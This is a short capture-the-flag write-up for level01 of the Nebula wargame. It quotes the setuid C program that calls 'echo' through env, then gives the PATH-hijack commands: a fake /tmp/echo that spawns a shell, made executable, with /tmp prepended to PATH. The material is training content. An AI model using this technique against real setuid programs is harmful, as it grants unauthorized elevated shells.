Exploit-Exercice : Nebula
Introduction
The level00 was not really hard. In this level we will cover a path vulnerabiliy as well as a weak coding program
Level01 - Path Attack
For this level we have the source code
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo and now what?");
}
This line will help us get the flag
system("/usr/bin/env echo and now what?");
The flag01 program call the echo command and print and now what
in the C code, echo is not a hardlink of the command so we can build our “own echo” command
create a new file call echo in /tmp
The contains of this file will be the following line
#!/bin/bash
/bin/sh
The script will simply run a shell as the flag01 account
make the script executable
chmod +x /tmp/echo
add tmp to the path variable
export PATH=/tmp:$PATH
You sucessfully get a shell and pwned level01 !